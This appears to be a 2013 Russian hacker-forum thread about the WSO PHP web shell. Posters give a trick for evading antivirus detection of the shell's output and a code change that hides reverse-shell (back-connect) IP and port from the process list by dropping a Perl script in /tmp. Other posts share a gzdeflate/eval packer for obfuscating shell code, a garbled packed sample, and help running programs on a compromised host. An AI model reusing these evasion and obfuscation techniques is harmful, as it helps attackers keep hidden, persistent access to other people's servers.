Старый 13.01.2013, 12:15   #151
Untitled
 
Аватар для Untitled
 
Регистрация: 24.06.2012
Сообщений: 131
Репутация: 30
По умолчанию

AV начали ругаться уже на HTML-выдачу шелла. В моем случае реакция идет на:
PHP код:
<input type=hidden name=a value='FilesMAn'
Решается добавлением любых непробельных символов в конце этой строчки.
Untitled вне форума   Ответить с цитированием
Старый 31.01.2013, 07:52   #152
Pashkela
 
Аватар для Pashkela
 
Регистрация: 05.07.2010
Сообщений: 1,243
По умолчанию

Если хотите, чтобы при бекконекте ваши данные (ip и port) не светились в процессах

Цитата:
perl /tmp/bc.pl 1.1.1.1 31337
(особенно забавно это наблюдать в "Вопросы по повышению привелегий"), то найдите строчку:

PHP код:
if($_POST['p1'] == 'bcp') { 
и после неё и до

PHP код:
sleep(1); 
замените код на:

PHP код:
 $t=@base64_decode($back_connect_p);
 
$t=str_replace('$ARGV[0]','"'.$_POST['p2'].'"',$t);
 
$t=str_replace('$ARGV[1]','"'.$_POST['p3'].'"',$t);
 
cf("/tmp/bc.pl",@base64_encode($t));
 
$out wsoEx("perl /tmp/bc.pl  1>/dev/null 2>&1 &"); 
и тогда в процессах самое большое, что будет видно:

Цитата:
perl /tmp/bc.pl
функционал не изменится

Последний раз редактировалось Pashkela; 31.01.2013 в 07:59..
Pashkela вне форума   Ответить с цитированием
Старый 13.10.2013, 11:55   #153
Ravenous
 
Регистрация: 14.07.2012
Сообщений: 64
Репутация: 1
По умолчанию

Как упаковать WSO, как P.A.S таким образом? Есть такие обфускаторы в паблике?
PHP код:
<?php $l___l_='>іDаAmNДx‹О†ЛZ‰*    „‹рЃ¤НЈp!u{y Ь{Ѕо6]Нъ»9&
ќO%л_Љ|ЩVне%т»Y+·WЙжTУdе8.B6
э§DcxHХ«]љ˜e8›ўѕЋF`(ћЭиeчП*a?$ЮДa„ObvЖP¦юXЏ8r_Ы№jЙzыёЋиWьТLЂ7*
{єA‚7ХПLюеeь’ЩNЈ”Яx8oа‡wжЛ’вшhЈAjьЕВe~ؘУ7хЯA&+ёВqm‡м”i+™сqЈ&ЕЏЬYNа
Ravenous вне форума   Ответить с цитированием
Старый 30.10.2013, 14:33   #154
shampoo
 
Регистрация: 30.10.2013
Сообщений: 10
Репутация: 1
По умолчанию

вот накидал простенький вариант в гзипе, обфусцируй распаковщик, чтобы не было строк и юзай:
Код:
<?php

echo php_pack(
		"<?php echo md5(123456); ?>"
	);


///
function php_pack($php_code)
{
    $php_code = strip_php_tags($php_code);
	
	$placeholder = "%PLACEHOLDER%";
	$unpacker = "<?php exit(eval(gzinflate(substr(file_get_contents(__FILE__),{$placeholder}))));?>";
	$unpacker_length = strlen($unpacker) - strlen($placeholder);
	$unpacker_length_real = $unpacker_length + strlen(strval($unpacker_length));

	$unpacker = str_replace($placeholder, $unpacker_length_real, $unpacker);
	return $unpacker . gzdeflate($php_code);
}


///
function strip_php_tags($php_code)
{
	$php_code = trim($php_code);

	if(substr($php_code, 0, 5) == '<?php') 
		$php_code = substr($php_code, 6);

	if(substr($php_code, -2, 2) == '?>') 
		$php_code = substr($php_code, 0, -2);

	return $php_code;
}
shampoo вне форума   Ответить с цитированием
Старый 01.11.2013, 10:55   #155
colobos
 
Регистрация: 15.08.2012
Сообщений: 9
Репутация: 0
По умолчанию

Цитата:
Сообщение от shampoo Посмотреть сообщение
вот накидал простенький вариант в гзипе, обфусцируй распаковщик, чтобы не было строк и юзай:
Код:
<?php

echo php_pack(
		"<?php echo md5(123456); ?>"
	);


///
function php_pack($php_code)
{
    $php_code = strip_php_tags($php_code);
	
	$placeholder = "%PLACEHOLDER%";
	$unpacker = "<?php exit(eval(gzinflate(substr(file_get_contents(__FILE__),{$placeholder}))));?>";
	$unpacker_length = strlen($unpacker) - strlen($placeholder);
	$unpacker_length_real = $unpacker_length + strlen(strval($unpacker_length));

	$unpacker = str_replace($placeholder, $unpacker_length_real, $unpacker);
	return $unpacker . gzdeflate($php_code);
}


///
function strip_php_tags($php_code)
{
	$php_code = trim($php_code);

	if(substr($php_code, 0, 5) == '<?php') 
		$php_code = substr($php_code, 6);

	if(substr($php_code, -2, 2) == '?>') 
		$php_code = substr($php_code, 0, -2);

	return $php_code;
}
Извините, но не совсем понятно, как этим пользоваться. На выходе мы получаем кодированный gzdeflate скрипт, но как его юзать, чтобы он работал? Я так понимаю Ravenous интересовался как обфусцировать какой-либо шелл, оставив его при этом работоспособным.
colobos вне форума   Ответить с цитированием
Старый 01.11.2013, 15:05   #156
KeyTeam
 
Регистрация: 04.08.2012
Сообщений: 33
Репутация: 0
По умолчанию

немного не в тему:
при каких условиях запуститься программа из консоли?
./myprog key1 key2&
KeyTeam вне форума   Ответить с цитированием
Старый 01.11.2013, 15:23   #157
Enigma
 
Аватар для Enigma
 
Регистрация: 17.06.2013
Сообщений: 37
Репутация: 12
По умолчанию

Цитата:
Сообщение от KeyTeam Посмотреть сообщение
немного не в тему:
при каких условиях запуститься программа из консоли?
./myprog key1 key2&
Немного странный вопрос. Ну при условии что можно выполнять команды(работает system например), существует программа ./myprog и ты находишься в одной директории с ней и у тебя есть право её выполнять(x). Или ты что-то другое имеешь ввиду?
Enigma вне форума   Ответить с цитированием
Старый 01.11.2013, 16:43   #158
KeyTeam
 
Регистрация: 04.08.2012
Сообщений: 33
Репутация: 0
По умолчанию

тогда наоборт задам вопрос, из за чего программа может не запускаеться?
если есть права на выполнение, 777 ,консоль почти от r58
KeyTeam вне форума   Ответить с цитированием
Старый 01.11.2013, 17:31   #159
Enigma
 
Аватар для Enigma
 
Регистрация: 17.06.2013
Сообщений: 37
Репутация: 12
По умолчанию

Ну может раздел смонтирован с noexec, это первое что пришло мне в голову.

Вывод какой-нибудь есть? С stderr (2>&1)
Enigma вне форума   Ответить с цитированием
Старый 02.11.2013, 01:25   #160
tex
 
Регистрация: 26.12.2010
Сообщений: 135
Репутация: 41
По умолчанию

Возможно еще, что лимитированно количество порождаемых пользователем процессов (man limits.conf). Но в таком случае должен эррор писать "Resource temporarily unavailable". Полезно использовать дабы не загружали сервер говноскриптами всякими (:
tex вне форума   Ответить с цитированием
Ответ

Метки
shell, wso, wso2

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2021, Jelsoft Enterprises Ltd. Перевод: zCarot